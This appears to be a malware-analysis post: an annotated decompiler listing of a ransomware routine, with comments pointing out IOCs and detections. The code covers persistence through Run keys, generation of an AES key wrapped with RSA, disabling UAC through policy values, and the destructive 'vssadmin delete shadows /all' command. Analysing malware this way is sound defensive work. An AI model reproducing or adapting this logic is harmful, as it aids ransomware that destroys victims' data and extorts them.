int * __cdecl RANSOM__ExecuteAndTakeover(){
    /* I've inserted comments rather than discussing this in the main body of the post, as I thought it would be
     * easier to follow this way. Reading order: (1) install + persist, (2) generate a per-victim AES-256 key and
     * wrap it with the embedded RSA public key, (3) stash the wrapped key plus a short victim ID in a file and in
     * the registry, (4) switch off UAC and delete shadow copies, (5) start the process killer and the GUI whose
     * window procedure carries the rest of the logic.
     * NOTE(review): this is a decompiler listing. Handle variables are reused and some constants are mislabelled
     * (the same numeric value has several names in wincrypt.h); those spots are flagged below, not "fixed". */
    int &Msg, &phkResult, NumberOfBytesWritten, lpString2, &ThreadId, &phKey, &phProv, hProv, &pdwDataLen, lpMultibyteStr;
    char &cbData[8]; /* used below as the cbData (byte count) argument of RegSetValueExA; the char[8] typing is
                      * probably just the decompiler's view of the stack slot -- TODO confirm */
    typedef struct tagWNDCLASSEX {
        UINT cbSize;
        UINT style;
        WNDPROC lpfnWndProc;
        int cbClsExtra;
        int cbWndExtra;
        HINSTANCE hInstance;
        HICON hIcon;
        HCURSOR hCursor;
        HBRUSH hbrBackground;
        LPCTSTR lpszMenuName;
        LPCTSTR lpszClassName;
        HICON hIconSm;
    } var_30;

    ncmdshow = dword_404b24 = 0; /* window stays hidden (SW_HIDE == 0) unless the first-run branch below changes it;
                                  * assumes ncmdshow/nCmdShow are the same variable with inconsistent casing in the listing */
    lpString2 = lpFilename = GlobalAlloc(GMEM_ZEROINIT, 0x8000); /* 32 KiB zeroed scratch buffer, reused for the module path, the
                                                                  * key blobs, the base64 ID and COMSPEC. The return value is never checked. */
    GetModuleFileNameA(0, lpFilename, 0x8000); /* full path of the running executable */
    if (lstrcmpiA("C:\Windows\notepad+++.exe", lpString2) != 0){
        /* Not running from the install location yet (case-insensitive compare), i.e. first run: persist via the
         * HKLM Run key, then copy ourselves into C:\Windows. Two Run values are written:
         *   "decrypt"   -> notepad.exe opens the ransom note at c:\How To Restore Files.txt at every logon
         *   "notepad++" -> relaunches the copied binary at every logon
         * Writing HKLM and C:\Windows needs administrative rights and none of the return values are checked, so on a
         * non-elevated run this branch silently does nothing and the binary keeps running from its original path
         * (re-entering this branch on every launch). The single backslashes in the compare string are presumably
         * a transcription artifact of the listing. */
        RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, KEY_ALL_ACCESS_and_WOW64_32KEY, &phkResult); /* KEY_WOW64_32KEY: explicitly the 32-bit view of the hive */
        cbData = lstrlenA("c:\\Windows\\notepad.exe \"c:\\How To Restore Files.txt\""); /* lstrlenA excludes the terminating NUL, which the REG_SZ contract says cbData should include */
        RegSetValueExA(phkResult, "decrypt", 0, REG_SZ, "c:\\Windows\\notepad.exe \"c:\\How To Restore Files.txt\"", cbData);
        cbData = lstrlenA("c:\\Windows\\notepad+++.exe");
        RegSetValueExA(phkResult, "notepad++", 0, REG_SZ, "c:\\Windows\\notepad+++.exe", cbData);
        RegCloseKey(phkResult);
        CopyFileA(lpString2, "c:\\Windows\\notepad+++.exe", 0); /* bFailIfExists == 0: overwrites an existing copy. Note the Run entries are written before the copy exists. */
        nCmdShow = 5; /* SW_SHOW: the ransom GUI is shown on the first run only */
    }
    dword_404b24 = 0; /* already zeroed above; harmless repeat (or the decompiler merged two stores) */
    CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_FULL, CRYPT_DELETEKEYSET); /* CRYPT_DELETEKEYSET deletes the default key container of this provider
                                                                              * and returns no handle: this clears leftover persisted key material from a
                                                                              * previous run rather than acquiring a "context" */
    if (CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT) == 0) CryptAcquireContextA(&phProv, 0, "Microsoft Enhanced Cryptographic Provider v1.0", PROV_RSA_FULL, CRYPT_VERIFYCONTEXT); /* ephemeral (CRYPT_VERIFYCONTEXT) RSA provider: default provider first, the Enhanced provider by name as fallback */
    CryptImportKey(phProv, pbData, 0x114, 0 0, &phKey); /* 0x114 == 276 bytes == 20-byte BLOBHEADER+RSAPUBKEY + 256-byte modulus, exactly the size of a PUBLICKEYBLOB
                                                          * for a 2048-bit RSA public key. So pbData is presumably the attacker's embedded public key ("2208 bits" is the blob
                                                          * size, not the key size). TODO confirm pbData[0] == 0x06 (PUBLICKEYBLOB) and that no private exponent is present. */
    CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_AES, CRYPT_VERIFYCONTEXT); /* second, ephemeral AES-capable provider. In this listing it overwrites the RSA provider
                                                                             * handle (decompiler variable reuse); the real code must keep both, see CryptEncrypt below. */
    CryptGenKey(hProv, CALG_AES_256, CRYPT_EXPORTABLE, phKey); /* fresh random AES-256 session key; CRYPT_EXPORTABLE is what permits the plaintext export next.
                                                                * The listing shows it landing in phKey, the same variable as the RSA key -- again likely handle reuse. */
    pdwDataLen = 0x2c;
    CryptExportKey(phKey, 0, CRYPT_NEWKEYSET, 0, lpString2, &pdwDatalen); /* Third argument is dwBlobType. The value labelled CRYPT_NEWKEYSET (0x8) is PLAINTEXTKEYBLOB (also 0x8)
                                                                           * in that position. 0x2c == 44 == 8-byte BLOBHEADER + 4-byte key length + 32-byte AES-256 key, exactly a
                                                                           * plaintext AES-256 key blob. This overwrites the module path that was in lpString2. */
    pdwDataLen = 0x2c; /* not redundant: CryptExportKey rewrote this in/out parameter; this sets the plaintext length for the encrypt call */
    CryptEncrypt(phKey, 0, CRYPT_EXPORTABLE, 0, lpString2, &pdwDataLen, CRYPT_SF); /* Positionally: hHash=0, Final=1 (labelled CRYPT_EXPORTABLE), dwFlags=0, pbData=lpString2 -- the 44-byte
                                                                                    * plaintext AES key blob, NOT the file path (that was overwritten above) -- dwBufLen=0x100 (labelled CRYPT_SF).
                                                                                    * Encrypting 44 bytes into a 256-byte buffer is consistent with RSA-2048 under the imported public key, i.e.
                                                                                    * the AES key is wrapped so only the holder of the private key can recover it. CryptEncrypt works in place,
                                                                                    * so the plaintext blob in lpString2 is replaced by the ciphertext. TODO confirm which handle is really passed:
                                                                                    * encrypting with the AES key itself would not need a 256-byte buffer. */
    CryptDestroyKey(phKey);
    CryptAcquireContextA(&phProv, 0, 0, PROV_RSA_FULL, CRYPT_DELETEKEYSET); /* delete the key container again so no copy of the key persists in the CSP */
    phProv = CreateFileA("c:\\Windows\DECODE.KEY", GENERIC_READ_WRITE, 0, 0, OPEN_ALWAYS, 0, 0); /* file HANDLE stored in the (mis-typed) phProv slot; OPEN_ALWAYS creates the file if absent */
    SetFilePointer(phProv, 0, 0, FILE_END) /* append: repeated runs accumulate one 256-byte blob each */
    WriteFile(phProv, lpString2, 0x100, &NumberofBytesWritten, 0); /* the 256-byte wrapped AES key */
    CloseHandle(phProv);
    /****************************************************************
     * Summary so far: a random AES-256 key was generated, exported
     * in plaintext, encrypted (by the 256-byte size, RSA-2048 under
     * the embedded public key) and the ciphertext appended to
     * c:\Windows\DECODE.KEY. DECODE.KEY is therefore the victim's
     * wrapped key, not a decryptor: the AES key is recoverable only
     * with the attacker's private key. The original module path was
     * only used for the install-location check; it is not an input
     * to the key material.
     ****************************************************************/
    lpMultiByteStr = lpString2+0x400;
    GENERIC__Base64(lpString2, lpString2+0x400, 0x100); /* base64 the 256-byte wrapped key into lpString2+0x400 (344 chars if it is standard base64) */
    RtlMoveMemory(0x40407C, lpMultiByteStr+0x10, 0xa); /* copy 10 base64 chars (offset 0x10 of the encoded key) into the ransom note array at 0x40407C: presumably a
                                                         * victim ID derived from the wrapped key, displayed in the note so the attacker can locate the matching key */
    MultiByteToWideChar(0x3, 0, lpMultiByteStr, -1, WideCharStr, 0xa); /* widens the base64 ID (lpMultiByteStr, not the note) into a 10-wchar buffer; code page 3 is CP_THREAD_ACP */
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DateTime\\", 0, KEY_ALL_ACCESS_and_WOW64_32KEY, &phkResult); /* a legitimate key (it holds the Internet Time server list under DateTime\Servers);
                                                                                                                                                  * the malware hides its state next to real configuration. The values written below are the IOCs. */
    cbData = 0xa;
    if(RegQueryValueExA(phkResult, "notepad++", 0, 0, RansomNoteArray+0x22, &lpcbData) != 0) if(cbData != 0xa) RegSetValueExA(phkResult, "notepad++", 0, REG_SZ, MultiByteStr, 0xa); /* store the 10-char ID under "notepad++" if none is present yet; the query reads straight into
                                                                                                                                                                                       * the ransom note buffer. The nested condition as decompiled looks off -- TODO re-check in the disassembly. */
    *MultiByteStr[0xa] = 0; /* truncate the base64 string to the 10-char ID so it can serve as a value name */
    RegSetValueExA(hKey lpMultiByteStr, 0, REG_BINARY, lpString2, 0x100); /* (missing comma is a listing artifact) second copy of the 256-byte wrapped key, under a value named by the ID */
    RegCloseKey(phkResult);
    RtlZeroMemory(lpString2, 0x8000); /* zero the whole buffer -- it is also the source of the DWORD 0 written three times below */
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, KEY_ALL_ACCESS_and_WOW64_32KEY, *phkResult);
    /* UAC is switched off by writing DWORD 0 (from the zeroed buffer) to three policy values. Writing this key needs admin
     * rights and the return values are unchecked, so on a non-elevated run these are silent no-ops. EnableLUA only takes
     * effect at the next logon/reboot. */
    RegSetValueExA(hKey, "PromptOnSecureDesktop", 0, REG_DWORD, lpString2, 0x4); /* 0: consent/credential prompts no longer use the secure desktop (MSDN: prompting occurs on the interactive user's desktop) */
    RegSetValueExA(hKey, "EnableLUA", 0, REG_DWORD, lpString2, 0x4); /* 0: disables Admin Approval Mode, i.e. UAC off for administrators */
    RegSetValueExA(hKey, "ConsentPromptBehaviorAdmin", 0, REG_DWORD, lpString2, 0x4); /* 0: the Consent Admin elevates without consent or credentials */
    RegCloseKey(hKey);
    GetEnvironmentVariableA("Comspec", lpString2, 0x5dc); /* %COMSPEC% (cmd.exe), at most 0x5dc == 1500 bytes */
    ShellExecuteA(0, 0, lpString2, "/c vssadmin delete shadows /all", 0, 0); /* delete all Volume Shadow Copies so files cannot be restored from previous versions; needs admin.
                                                                              * cmd.exe /c launching "vssadmin delete shadows /all" is one of the highest-signal detections in this sample. */
    GlobalFree(lpString2); /* scratch buffer released here; nothing below may touch lpString2/lpMultiByteStr */
    SetErrorMode(0x1); /* 0x1 == SEM_FAILCRITICALERRORS: no critical-error dialogs (e.g. unreadable removable/network drives), presumably to keep the later file walk silent */
    CreateThread(0, 0, RANSOM__ProcKiller, 0, 0, &ThreadId); /* background thread that walks running processes and kills non-whitelisted ones (see RANSOM__ProcKiller) */
    InitCommonControls(); /* obsolete per MSDN (superseded by InitCommonControlsEx) */
    var_30.cbSize = 0x30; /* 48 == sizeof(WNDCLASSEXA) on 32-bit, consistent with the KEY_WOW64_32KEY usage above */
    var_30.style = CS_VREDRAW_AND_HREDRAW;
    var_30.lpfnWndProc = RANSOM__CallMainFunctionality; /* the window procedure appears to be where the actual encryption logic lives; lots going on there -- needs its own analysis */
    var_30.CbClsExtra = 0;
    var_30.cbWndExtra = 0x1e;
    var_30.hInstance = hInstance;
    var_30.hbrBackground = COLOR_BTNSHADOW;
    var_30.lpszClassName = "notepad++"; /* window class name -- another IOC (usable for a FindWindow-style check or an EDR rule) */
    RegisterClassExA(*var_30)
    CreateDialogParamA(hInstance, 0x65, 0, RANSOM__CallMainFunctionality, 0); /* modeless dialog from resource 101 with the same procedure */
    ShowWindow(hWnd, nCmdShow); /* 5 (SW_SHOW) on the first run, 0 (SW_HIDE) afterwards */
    UpdateWindow(hWnd);
    while ( GetMessageA(&lpMsg, 0, 0, 0) != 0 ){ /* standard message pump; loops until WM_QUIT, so the work happens inside the window/dialog procedure */
        TranslateMessage(&Msg);
        DispatchMessageA(&Msg);
    }
    CryptDestroyKey(phKey);
    return(Msg.wParam); /* exit code == WM_QUIT's wParam */
}